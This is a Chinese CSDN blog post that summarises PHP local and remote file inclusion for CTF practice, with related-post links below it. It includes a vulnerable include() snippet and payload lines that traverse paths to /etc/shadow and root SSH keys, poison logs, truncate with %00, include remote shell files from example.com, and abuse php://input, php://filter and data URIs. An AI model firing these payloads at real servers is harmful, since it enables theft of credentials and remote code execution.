文件包含小总结 By Assassin

最新推荐文章于 2024-06-20 20:30:56 发布
最新推荐文章于 2024-06-20 20:30:56 发布
阅读量472 收藏
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35078631/article/details/76637949
版权

这么长时间对文件包含都不甚了解,小小总结一下
文件包含大致分为本地包含和远程包含,这里先用include讲解吧。事实上扩展函数一大堆

这里写图片描述

在本地包含的时候,如果没有php代码,包含文件会把文件内容输出;如果存在php文件,或者包含了远程的恶意程序,当前代码就会引用执行包含的程序。

1. 普通本地文件包含

<?php include("inc/" . $_GET['file']); ?>

然后就可以遍历内容了,只要指导结构,且没设置权限。下面举几个例子

(linux中这两个文件储存着所有文件的路径,需要root权限)
?file=../../../../../../../../../var/lib/locate.db 
?file=../../../../../../../../../var/lib/mlocate/mlocate.db

包含错误日志:
?file=../../../../../../../../../var/log/apache/error.log (试试把UA设置为“”来使payload进入日志)

获取web目录或者其他配置文件:
?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf

读取session文件:
?file=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7
(session文件一般在/tmp目录下,格式为sess_[your phpsessid value],有时候也有可能在/var/lib/php5之类的,在此之前建议先读取配置文件。在某些特定的情况下如果你能够控制session的值,也许你能够获得一个shell)

如果有root权限可以试试下面的:

/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/id_rsa.pub
/root/.ssh/known_hosts
/etc/shadow
/root/.bash_history
/root/.mysql_history
/proc/self/fd/fd[0-9]* (文件标识符)
/proc/mounts
/proc/config.gz

2.有限制的本地文件包含

<?php include("inc/" . $_GET['file'] . ".htm"); ?>

(1)%00截断:

?file=../../../../../../../../../etc/passwd%00

(需要 magic_quotes_gpc=off,PHP小于5.3.4有效)

(2)%00截断目录遍历:

?file=../../../../../../../../../var/www/%00

(需要 magic_quotes_gpc=off,unix文件系统,比如FreeBSD,OpenBSD,NetBSD,Solaris)

(3)路径长度截断:

?file=../../../../../../../../../etc/passwd/././././././.[…]/./././././.

(php版本小于5.2.8(?)可以成功,linux需要文件名长于4096,windows需要长于256)

(4)点号截断:

?file=../../../../../../../../../boot.ini/………[…]…………

(php版本小于5.2.8(?)可以成功,只适用windows,点号需要长于256)

3.普通远程文件包含

(1)远程代码执行:

?file=[http|https|ftp]://example.com/shell.txt

(需要allow_url_fopen=On并且 allow_url_include=On)

(2)利用php流input:

?file=php://input

(需要allow_url_include=On,详细→http://php.net/manual/en/wrappers.php.php)

(3)利用php流filter:

?file=php://filter/convert.base64-encode/resource=index.php
?file=php://filter/read=string.rot13/resource=main
?file=php://filter/read=string.strip_tags/resource=main

作者:王一航
链接:http://www.jianshu.com/p/fd9f38753078
來源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
(需要allow_url_include=On,详细→http://php.net/manual/en/wrappers.php.php)

(4)利用data URIs:

?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=

(需要allow_url_include=On)

(5)利用XSS执行任意代码:

?file=http://127.0.0.1/path/xss.php?xss=phpcode

(需要allow_url_fopen=On,allow_url_include=On并且防火墙或者白名单不允许访问外网时,先在同站点找一个XSS漏洞,包含这个页面,就可以注入恶意代码了。条件非常极端和特殊- -)

4.有限制的远程文件包含

?file=http://example.com/shell
?file=http://example.com/shell.txt?
?file=http://example.com/shell.txt%23
(需要allow_url_fopen=On并且allow_url_include=On)

?file=\evilshare\shell.php (只需要allow_url_include=On)

基本上是借鉴别人的总结,但是发一下加深印象。以后有新的再补充。

Assassin__is__me
关注
专栏目录
文件包含知识点总结.pdf
02-10
根据网上视频课程学习总计知识点,文档结构分为文件包含的定义、php中文件包含函数、漏洞原理及特点、常见的利用方式做出总结 整理为文档 可以方便查阅
文件包含漏洞总结
weixin_34252090的博客
10-18 193
本实验是基于DVWA和sqli-labs的实验环境实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下。安装只要注意Wamp环境的数据库名和密码对应即可。0x01:文件包含漏洞服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶...
CTF中文件包含漏洞总结
最新发布
qq_64395221的博客
06-20 1332
通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。
文件包含总结
qq_57686163的博客
08-19 713
php伪协议总结、和一些日志文件的包含方法
Seacms漏洞分析利用复现 By Assassin
qq_43679818的博客
11-13 341
Seacms漏洞分析利用复现 By Assassin
CTF-练习平台 Web writeup By Assassin 暂时完结
qq_43679818的博客
11-13 4373
CTF-练习平台 Web writeup By Assassin 暂时完结
CTF-练习平台 Web writeup By Assassin [暂时完结]
热门推荐
Assassin
04-06 7万+
签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改一下浏览器中的text的长度Web3进去一直弹框,没完没了…直接禁用了F12看源码,发现有一个<!--KEY&#
i春秋 百度杯”CTF比赛(二月场) Misc&&web题解 By Assassin
Assassin
03-16 2万+
学习web,搞起来! 百度杯”CTF比赛(二月场)训练赛传送门爆破-1打开题目我们直接就看到源码,加上注释如下<?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 if(!preg_match('/^\w*$/',$a )){ //正则
文件包含知识总结
qq_42570883的博客
01-08 1543
0×01 文件包含 Q:什么是文件包含? A:简单一句话,为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来, 直接使用包含文件的代码。 Q:文件包含漏洞的成因是什么? A:在包含文件的时候,为了灵活包含文件,将包含文件设置为变量,通过动态变量来引入需要包含的文件时, 用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞, 通常文件包含漏洞出现在PHP语言中。 文件包含漏洞的形成,简单来说,需要满足两个条件: 1、用户能够控制这
文件包含的小总结
sinat_38378265的博客
05-10 1003
这是本人对于文件包含的一些小归纳,小总结,对于一些新人小白有一定的引导作用,对于老人来说是可能微不足道,做的不好忘大家多多包含,祝你前程似锦。
文件包含知识点详细总结
m0_73605862的博客
02-12 1457
在PHP语法篇的10.文件里面我们讲了include和require和include_one和require_one这些,如果大家忘记了,可以返回去看看。其实我看到老师写的书上也还在说这个,但是我看官方手册上面allow_url_include自php7.4就废除了,还发现就算是再新的书都有一定的滞后性,大家还是以手册为主。虽然废除了,但是我们还是讲解这两个在php.ini配置文件中的作用这个选项允许include,require,include_one和require四个函数的使用。
文件包含利用总结(本地文件包含、远程文件包含、常用敏感文件、phpinfo利用、伪协议利用)
墨痕诉清风的博客
04-18 199
文件包含利用总结(本地文件包含、远程文件包含、常用敏感文件、phpinfo利用)
PHP文件包含漏洞总结
坚持硬核
10-07 3421
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码中。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的时候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
文件包含漏洞 基础
weixin_50464560的博客
03-21 966
CTF中文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据allow_...
文件包含漏洞学习,面试总结+详细解答
2401_83974020的博客
04-14 1068
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
文件包含漏洞详解 一文了解文件包含漏洞
闵行小鱼塘
11-07 1982
本篇总结归纳文件包含漏洞
linux文件目录:.ssh目录下各文件的作用
qq_16268979的博客
10-02 1万+
一、id_rsa(私钥)   服务器上经过rsa算法生成的私钥。与公钥是一对的密钥对,用于连接其他服务器用。 二、id_rsa.pub(公钥)   服务器上经过rsa算法生成的公钥。与私钥是一对的密钥对,用于连接其他服务器用。   将主机A的id_rsa.pub内容copy到B主机的authorized_keys文件中,这样A主机就能不通过密码连接到B主机。 三、authorized_keys(授权文件)   实现真正无密码连接,即为授权文件,当把master的公钥添加到authorized_keys文件中
Templar Assassin
04-02
Templar Assassin is a hero in the popular online multiplayer game Dota 2. She is a melee agility hero with excellent burst damage and mobility, making her a formidable assassin. Her abilities include ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值